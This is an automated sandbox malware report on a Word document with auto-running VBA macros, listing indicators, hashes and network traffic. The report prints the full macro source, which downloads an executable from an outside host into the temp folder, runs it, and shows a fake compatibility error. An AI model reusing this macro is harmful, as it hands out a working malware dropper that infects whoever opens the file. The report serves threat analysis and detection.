5762576fc6a09b4ddd95908c6c34ab9b38e06a6b2878099433347cabfbeccc18
This report is generated from a file or URL submitted to this webservice on December 10th 2015 07:21:50 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v3.00 © Hybrid Analysis
Attention: this analysis ran with the legacy Usermode Monitor. It is highly recommended to use the Kernelmode Monitor.
Incident Response
Risk Assessment
- Remote Access: Contains a remote desktop related string
- Network Behavior: Contacts 1 domain and 1 host
Indicators
Malicious Indicators 8
Exploit/Shellcode
- Found URL in decoded VBA string
  - details:
    Pattern match: "http://germanya.com.ec/logs/test.exe"
    Pattern match: "http://germanya.com.ec/logs/counter.php"
  - source: File/Memory
  - relevance: 10/10
External Systems
- Sample was identified as malicious by a large number of Antivirus engines
  - details: 33/55 Antivirus vendors marked sample as malicious (60% detection rate)
  - source: External System
  - relevance: 10/10
- Sample was identified as malicious by at least one Antivirus engine
  - details: 33/55 Antivirus vendors marked sample as malicious (60% detection rate)
  - source: External System
  - relevance: 8/10
General
- GETs files from a webserver
  - details:
    "GET /logs/test.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: germanya.com.ec
    Connection: Keep-Alive"
  - source: Network Traffic
  - relevance: 10/10
Network Related
- Malicious artifacts seen in the context of a contacted host
  - details:
    Found malicious artifacts related to "192.185.72.225" (ASN: 20013, Owner: CyrusOne LLC): ...
    URL: http://germanya.com.ec/logs/counter.php" (AV positives: 2/63 scanned on 07/13/2015 21:43:07)
    URL: http://germanya.com.ec/ (AV positives: 1/63 scanned on 05/06/2015 14:53:46)
    URL: http://germanya.com.ec/logs/counter.php (AV positives: 4/52 scanned on 05/22/2014 09:32:35)
    URL: http://germanya.com.ec/logs/test.exe (AV positives: 10/51 scanned on 05/19/2014 10:39:20)
    URL: http://constructorachegados.com/lpc (AV positives: 2/51 scanned on 05/02/2014 01:06:31)
    File SHA256: 1e9ff24f8df1eaae94c73aa802b0bfb7ef229fee3a8043defe4cff0ba7032297 (AV positives: 36/53 scanned on 05/19/2014 10:39:23)
  - source: Network Traffic
  - relevance: 10/10
Unusual Characteristics
- Contains embedded VBA macros with keywords that indicate auto-execute behavior
  - details:
    Found keyword "Auto_Open" which indicates: "Runs when the Excel Workbook is opened"
    Found keyword "Workbook_Open" which indicates: "Runs when the Excel Workbook is opened"
    Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
  - source: Static Parser
  - relevance: 10/10
- Contains embedded string that indicates auto-execute behavior
  - details:
    Found keyword "Auto_Open" which indicates: "Runs when the Excel Workbook is opened"
    Found keyword "Workbook_Open" which indicates: "Runs when the Excel Workbook is opened"
    Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
  - source: File/Memory
  - relevance: 10/10
Hiding 1 Malicious Indicator (available only in the private webservice or standalone version)
Suspicious Indicators 7
Network Related
- Found potential URL in binary/memory
  - details:
    Pattern match: "http://germanya.com.ec/logs/test.exe"
    Pattern match: "http://germanya.com.ec/logs/counter.php"
    Pattern match: "http://ns.adobe.com/xap/1.0/"
    Pattern match: "E.yo/#Tcb0jVxbKTbvnqZ4uF1mDmm-k9c^E7~'dZi"
    Pattern match: "fE.qVy/VN#7WA"
    Pattern match: "stu9lIL.tS/\3!#ep2,$FG_LXn7F"
    Heuristic match: "fckOPaK.TG"
    Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
    Pattern match: "www.despachospublicos.com/sites/default/files/Dian%20.jpg?1345649341"
    Pattern match: "genya.com.ec/logs/test.exe"
    Pattern match: "http://germanya.com.ec/logs/test.exeTMP$2\sfjozjero.exeA@0'http://germanya.com.ec/logs/counter.phpTMP$2"
    Pattern match: "linksur.cl/tienda/css/tert.exeTMP\sfjozjeri.exeVBE6.DLL"
    Pattern match: "http://bit.ly/1gudjPa\lkjljlljk"
    Pattern match: "germanya.com.ec/logs/test.exe\sfjozjero.exeNhttp://germanya.com.ec/logs/counter.phppFrU~"
    Pattern match: "http://gmpg.org/xfn/11"
    Pattern match: "http://code.jquery.com/jquery-1.9.1.js"
    Pattern match: "http://ip/~username/"
    Pattern match: "http://example.com/example/Example/help.html"
    Pattern match: "addondomain.com/example/Example/"
  - source: File/Memory
  - relevance: 2/10
- Uses a User Agent typical for browsers, although no browser was ever launched
  - details: Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  - source: Network Traffic
  - relevance: 10/10
Remote Access Related
- Contains a remote desktop related string
  - details:
    "la,k ,Sin lista<U<Hipervnculo>*B*phZBZTexto independienteCJOJQJ^JmH" (Indicator for product: Generic VNC)
    "4NVANHipervnculo visitado>*B*phdQRdTexto independiente 3$a$CJOJQJ^JmH" (Indicator for product: Generic VNC)
  - source: File/Memory
  - relevance: 10/10
Unusual Characteristics
- Contains embedded VBA macros with suspicious keywords
  - details:
    Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
    Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
    Found suspicious keyword "Environ" which indicates: "May read system environment variables"
    Found suspicious keyword "URLDownloadToFileA" which indicates: "May download files from the Internet"
  - source: Static Parser
  - relevance: 10/10
- Contains embedded string with suspicious keywords
  - details:
    Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
    Found suspicious keyword "Open" which indicates: "May open a file"
    Found suspicious keyword "Environ" which indicates: "May read system environment variables"
    Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
    Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
    Found suspicious keyword "URLDownloadToFileA" which indicates: "May download files from the Internet"
  - source: File/Memory
  - relevance: 10/10
- Installs hooks/patches the running process
  - details:
    "WINWORD.EXE" wrote bytes "E923194EF1" to virtual address "0x77353D01" ("SetUnhandledExceptionFilter@kernel32.dll")
    "WINWORD.EXE" wrote bytes "055324E6" to virtual address "0x2FF71634" (part of module "WINWORD.EXE")
  - source: Hook Detection
  - relevance: 10/10
Hiding 1 Suspicious Indicator (available only in the private webservice or standalone version)
Informative 6
General
- Contacts domains
  - details: "germanya.com.ec"
  - source: Network Traffic
  - relevance: 1/10
- Contacts server
  - details: "192.185.72.225:80"
  - source: Network Traffic
  - relevance: 1/10
- Contains embedded VBA macros
  - details:
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Option Explicit
Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long, _
ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
ByVal HQTLDG As Long) As Long
Sub AutoOpen()
Auto_Open
End Sub
Sub Auto_Open()
SNVJYQ
End Sub
Public Sub SNVJYQ()
OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.exe"
End Sub
Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
Dim HRKUYU, lala As Long
HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
If HRKUYU = 0 Then OGEXYR = True
Dim YKPZZS
YKPZZS = Shell(PHHWIV, 1)
MsgBox "El contenido de este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no compatible"
lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Environ("TMP") & "\lkjljlljk", 0, 0)
Application.DisplayAlerts = False
Application.Quit
End Function
Sub Workbook_Open()
Auto_Open
End Sub"
  - source: Static Parser
  - relevance: 10/10
- Creates mutants
  - details:
    "IESQMMUTEX_0_208"
    "KYIMEShareCachedData.MutexObject.PSPUBWS"
    "KYTransactionServer.MutexObject.PSPUBWS"
    "Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
    "Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
    "Local\c:!users!pspubws!appdata!roaming!microsoft!windows!ietldcache!"
    "Local\WininetStartupMutex"
    "Local\WininetConnectionMutex"
    "Local\WininetProxyRegistryMutex"
    "Local\ZonesCounterMutex"
    "Local\ZoneAttributeCacheCounterMutex"
    "Local\ZonesCacheCounterMutex"
    "Local\ZonesLockedCacheCounterMutex"
  - source: Created Mutant
  - relevance: 3/10
- Loads rich edit control libraries
  - details: "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\office12\riched20.dll" at 672E0000
  - source: Loaded Module
Installation/Persistence
- Dropped files
  - details: "carved_0.exe" has type "HTML document, ASCII text, with very long lines"
  - source: Binary File
  - relevance: 3/10
File Details
5762576fc6a09b4ddd95908c6c34ab9b38e06a6b2878099433347cabfbeccc18
- Filename: 5762576fc6a09b4ddd95908c6c34ab9b38e06a6b2878099433347cabfbeccc18
- Size: 520KiB (531968 bytes)
- Type: doc office
- Description: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Gu, Author: OFEyDV, Template: Normal.dotm, Last Saved By: clein, Revision Number: 13, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:20:00, Last Printed: Wed Jun 7 15:04:00 2006, Create Time/Date: Mon Mar 30 15:18:00 2009, Last Saved Time/Date: Wed May 14 13:45:00 2014, Number of Pages: 7, Number of Words: 269, Number of Characters: 1485, Security: 0
- Architecture: WINDOWS
- SHA256: 5762576fc6a09b4ddd95908c6c34ab9b38e06a6b2878099433347cabfbeccc18
- MD5: 4aa84fb242abbba1a9dd2b8976cab2ce
- SHA1: 5055803a59b82b1c33c6a78150b07a080f0bcadd
Classification (TrID)
- 35.9% (.DOC) Microsoft Word document
- 33.7% (.XLS) Microsoft Excel sheet
- 21.3% (.DOC) Microsoft Word document (old ver.)
- 8.9% (.) Generic OLE2 / Multistream Compound File
Hybrid Analysis
Analysed 1 process in total (System Resource Monitor).
- WINWORD.EXE /n /dde (PID: 2952)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
germanya.com.ec | 192.185.72.225 | - | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
192.185.72.225 | 80/TCP | - | United States, ASN: 20013 (CyrusOne LLC) |
HTTP Traffic
Endpoint | Request | URL |
---|---|---|
192.185.72.225:80 (germanya.com.ec) | GET | germanya.com.ec/logs/test.exe |
Extracted Files
Informative 1
- carved_0.exe
  - Size: 12KiB (11812 bytes)
  - Type: HTML document, ASCII text, with very long lines
  - Context: germanya.com.ec
  - MD5: e58a860d8e41196fe5a0d71131d5f341
  - SHA1: eb3088e3a139889d331af84dcf3e06fba2613c63
  - SHA256: b98e58f0f2c62969d61ce2ec31043dacb8d378ecbbfcae138b6250d432e195dd